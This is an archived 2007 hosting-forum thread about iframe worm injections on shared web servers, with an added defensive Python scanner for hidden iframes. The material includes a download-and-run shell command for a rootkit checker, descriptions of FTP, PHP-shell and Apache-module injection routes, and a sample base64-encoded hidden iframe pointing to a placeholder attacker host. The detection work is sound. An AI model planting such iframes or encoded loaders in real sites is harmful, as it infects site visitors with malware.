Posted by TigerHosting, 07-13-2007, 11:45 AM I have recently found that several of the web sites that I'm hosting on my server have worms: when you access the web sites in Internet Explorer, the antivirus is triggered. When you look at the source code there's always an iframe that loads a remote web page with a worm. Have you seen it already? How did these web sites get infected? Is there an easy way to clean them or is it the hard way? I ran a clamscan on the server and it didn't find anything.
Posted by Outlaw Web Master, 07-13-2007, 11:54 AM Do you have rkhunter or any other rootkit checker on your server? If you do, run a scan to check for rootkits... and while you're at it maybe check and update the security of your system, because it might be possible that your system needs patching. To install rkhunter, log in to your box and use
wget http://www.coreisp.nl/rkhunter.sh
sh rkhunter.sh
then run a scan to be on the safe side. The iframe worms are IE exploits; maybe read G http://www.google.co.uk/search?hl=en...e+Search&meta= OWM Last edited by Outlaw Web Master; 07-13-2007 at 12:05 PM.
Posted by hbhb, 07-14-2007, 01:56 AM if that happens does that mean the system is rooted?
Posted by Outlaw Web Master, 07-14-2007, 07:36 AM It doesn't mean the system is rooted at all... but it most likely means that the system needs patching and those worms/viruses removed. Here's an explanation on how to find and remove them... obviously using "flame" as an example; you'd have to find the name of the ones on your server and replace the name. OWM Last edited by Outlaw Web Master; 07-14-2007 at 07:39 AM.
Posted by TigerHosting, 07-17-2007, 09:15 PM I found out. On the web site, there's a file that had this malicious code: It printed an iframe that imported a worm from a Russian web site (googlerank.info). Now how did it get there? No idea... I scanned for rootkits, for virus, nothing... The passwords are all 10+ letters, latest patches on RHEL. The server is certified "Hacker-safe" by a 3rd party organization....
Posted by Scott.Mc, 07-17-2007, 09:37 PM Let me first comment on this part: "The server is certified "Hacker-safe" by a 3rd party organization...." A Nessus scan does not make you secure in the slightest; those are nothing more than marketing logos. With the newer iframe exploits most of them come via FTP (however, note this is a general assumption based upon experience lately). You would have to check all logs to confirm where it came from or how it was inserted. There are several forms, from basic ones that insert into files to the newer ones which insert themselves in memory. You would be best to get a system administrator to check your server to see how, where, why and how to prevent it. -Scott
Posted by Ramprage, 07-17-2007, 10:04 PM Yep, Scott's right, there are a few variations of the attacks.
- FTP download / inject code into page and upload.
- Modify Apache memory through PHP like enable_DL; this is the flame.so which was posted above, one variant anyways.
- Script attack such as phpshell, modify world-writable pages or even database templates.
They're a combination of exploits an attacker uses to spread viruses/malware and infect website visitors with trojans and stuff. They first find vulnerable web servers/sites to infect and use them to help spread their garbage to the world... Rootkit detectors will not pick anything up, so don't bother scanning. Since these attacks are not root hacks (well, 99.9% they're not), scanning will generally result in nothing found.
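A defender-side check for the case TigerHosting describes above (a page on the web root that prints an injected iframe) and for Ramprage's "inject code into page" variant: an added example, not code posted in this thread. It flags iframes that point off-site, are collapsed to 0/1 pixels or hidden by CSS, and unwraps base64_decode('...') arguments in PHP so an echoed, encoded iframe is inspected too. The trusted host list, the attacker.example host and the sample page are constructed assumptions.

```python
import base64
import re
from urllib.parse import urlparse

# Heuristics for an injected iframe: it points off-site, it is collapsed to
# 0/1 pixels or hidden by CSS, or it sits inside a base64 string that the
# server-side code decodes and echoes at request time.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
DIM_RE = re.compile(r"""(?:width|height)\s*[=:]\s*["']?(\d+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
B64_RE = re.compile(r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']""")

def suspicious_iframes(content, trusted_hosts):
    """Return (tag, reasons) for every iframe in content that trips a heuristic."""
    findings = []
    # Unwrap base64_decode('...') arguments so encoded iframes are inspected too.
    for blob in B64_RE.findall(content):
        try:
            content += "\n" + base64.b64decode(blob).decode("latin-1")
        except ValueError:
            pass  # not valid base64, nothing to unwrap
    for tag in IFRAME_RE.findall(content):
        reasons = []
        src = SRC_RE.search(tag)
        host = urlparse(src.group(1)).hostname if src else None
        if host and host not in trusted_hosts:
            reasons.append("src points off-site: " + host)
        dims = [int(d) for d in DIM_RE.findall(tag)]
        if dims and max(dims) <= 1:
            reasons.append("collapsed to %dpx" % max(dims))
        if HIDDEN_RE.search(tag):
            reasons.append("hidden by CSS")
        if reasons:
            findings.append((tag, reasons))
    return findings

# Constructed sample: a PHP page that echoes a base64-encoded 1x1 iframe
# loading from a placeholder host (attacker.example is not a real site).
HIDDEN_TAG = '<iframe src="http://attacker.example/in.cgi" width=1 height=1></iframe>'
SAMPLE_PHP = ('<html><body>Welcome</body></html>\n<?php echo base64_decode("%s"); ?>'
              % base64.b64encode(HIDDEN_TAG.encode()).decode())

if __name__ == "__main__":
    for tag, why in suspicious_iframes(SAMPLE_PHP, {"www.example.com"}):
        print(tag, "->", "; ".join(why))
```

Run it over every .html/.php/.js file under the web root (and over the template rows in the database, per Ramprage's third variant) to get a list of files to inspect by hand.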
Posted by Scott.Mc, 07-17-2007, 10:07 PM Just an FYI, I was not speaking about Apache memory; flame.so is old. I was speaking about specific rootkits designed to hide in /dev/kmem. The newer ones send the iframe only once per IP as well. Just an off-topic note, that is all.